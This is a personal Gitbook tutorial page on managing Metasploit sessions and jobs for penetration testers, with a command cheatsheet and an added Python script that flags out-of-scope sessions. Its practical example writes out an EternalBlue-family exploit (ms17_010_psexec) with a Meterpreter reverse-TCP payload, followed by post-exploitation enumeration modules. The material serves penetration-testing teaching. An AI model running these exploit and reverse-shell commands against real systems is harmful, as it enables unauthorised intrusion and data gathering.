Noirchapeau's Gitbook

Sessions and Jobs

Overview

Sessions and jobs in Metasploit enable penetration testers to manage multiple ongoing tasks, maintain access to exploited systems, and organize their workflows. This chapter focuses on understanding, creating, and managing sessions and jobs effectively.

Sessions in Metasploit

A session is an active connection between the attacker and the target system, established after a successful exploit. Sessions allow interaction with compromised systems through Meterpreter shells, command-line interfaces, or other payload connections.

Working with Sessions

  1. List Active Sessions:

    • View all open sessions:

      sessions
  2. Interact with a Session:

    • Switch to a specific session:

      sessions -i <session_id>
  3. Background a Session:

    • Send an active session to the background:

      background
    • Alternatively, use Ctrl+Z to background a session.

  4. Terminate a Session:

    • End a specific session:

      sessions -k <session_id>
    • Kill all active sessions:

      sessions -K
  5. View Session Information:

    • Display details about a specific session:

      sessions -i <session_id>
      info

Jobs in Metasploit

A job is a background task running in Metasploit. Jobs are often used for long-running tasks, such as exploit handlers or auxiliary modules like scanners.

Working with Jobs

  1. List Active Jobs:

    • Display all running jobs:

      jobs
  2. Stop a Job:

    • Terminate a specific job:

      jobs -k <job_id>
    • Kill all active jobs:

      jobs -K
  3. Run a Module as a Job:

    • Execute an exploit or auxiliary module in the background:

      exploit -j
  4. View Job Information:

    • Display detailed information about a job:

      jobs -v

Using Sessions and Jobs Together

  1. Exploit and Maintain Access:

    • Run an exploit in the background while monitoring active sessions:

      exploit -j
      sessions
  2. Link Modules to a Session:

    • Use post-exploitation modules on an existing session:

      use post/windows/gather/enum_logged_on_users
      set SESSION <session_id>
      run
  3. Switch Between Sessions:

    • Interact with multiple compromised systems by switching between sessions:

      sessions -i <session_id>
  4. Background a Session to Free the Console:

    • Background a session to free up the console for other tasks. The session stays open and remains listed under sessions, not under jobs:

      background

Practical Example: Meterpreter Session

  1. Create a Session:

    • Use an exploit to gain access:

      use exploit/windows/smb/ms17_010_psexec
      set payload windows/meterpreter/reverse_tcp
      set RHOSTS <target_ip>
      set LHOST <attacker_ip>
      exploit
  2. Interact with the Session:

    • Check active sessions:

      sessions
    • Interact with the session:

      sessions -i 1
  3. Background the Session:

    background
  4. Run a Post-Exploitation Module:

    • Gather system information from the target:

      use post/windows/gather/system_info
      set SESSION 1
      run

Best Practices

  1. Organize Sessions and Jobs:

    • Regularly list and terminate unused sessions and jobs to avoid conflicts.

  2. Track Active Sessions:

    • Use meaningful notes or labels to identify each session (e.g., IP or hostname).

  3. Monitor Resource Usage:

    • Avoid running too many concurrent jobs or sessions to prevent performance issues.

  4. Background Long-Running Tasks:

    • Always background tasks like handlers or scanners to free up the console.
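
One way to act on the first two practices, as an added example that is not part of the original page: parse a saved copy of the sessions listing and flag any session whose target falls outside the agreed engagement scope, so it can be closed and recorded. The table layout, the sample rows and the SCOPE network are constructed assumptions.

```python
import ipaddress
import re

SCOPE = ["10.10.10.0/24"]  # constructed engagement scope (assumption)
# Constructed sample of the `sessions` table; the column layout is an assumption.
SAMPLE = r"""
Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1   dc01  meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DC01  10.10.14.2:4444 -> 10.10.10.40:49158 (10.10.10.40)
  2         shell cmd/unix                                       10.10.14.2:4445 -> 10.10.20.7:51022 (10.10.20.7)
  3         meterpreter x64/windows  LAB\svc_backup @ FS02       10.10.14.2:4444 -> 10.10.10.52:50211 (10.10.10.52)
"""

def parse_sessions(text):
    """Parse the fixed-width listing into one dict per session."""
    lines = text.splitlines()
    # The dashed rule under the header marks where each column starts.
    rule = next(i for i, ln in enumerate(lines) if ln.strip() and set(ln.strip()) <= {"-", " "})
    starts = [m.start() for m in re.finditer(r"-+", lines[rule])]
    bounds = list(zip(starts, starts[1:] + [None]))
    names = [lines[rule - 1][a:b].strip().lower() for a, b in bounds]
    rows = []
    for line in lines[rule + 1:]:
        if not line.strip():
            break
        row = dict(zip(names, (line[a:b].strip() for a, b in bounds)))
        m = re.search(r"->\s*(\S+):\d+", row["connection"])
        row["target"] = m.group(1) if m else None  # remote end of the connection
        rows.append(row)
    return rows

def out_of_scope(rows, scope_cidrs):
    """Return sessions whose target is unparseable or outside every scope network."""
    nets = [ipaddress.ip_network(c) for c in scope_cidrs]
    def inside(target):
        try:
            return any(ipaddress.ip_address(target or "") in n for n in nets)
        except ValueError:
            return False  # unparseable target: flag for manual review
    return [r for r in rows if not inside(r["target"])]

if __name__ == "__main__":
    for row in out_of_scope(parse_sessions(SAMPLE), SCOPE):
        print(f"session {row['id']} ({row['target']}) is out of scope: sessions -k {row['id']}")
```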


Command Cheatsheet

Command            Description
-----------------  -----------------------------------
sessions           List all active sessions.
sessions -i <id>   Interact with a specific session.
sessions -k <id>   Terminate a specific session.
sessions -K        Kill all active sessions.
jobs               List all running jobs.
jobs -k <id>       Terminate a specific job.
jobs -K            Kill all active jobs.
exploit -j         Run an exploit as a background job.
background         Background the current session.
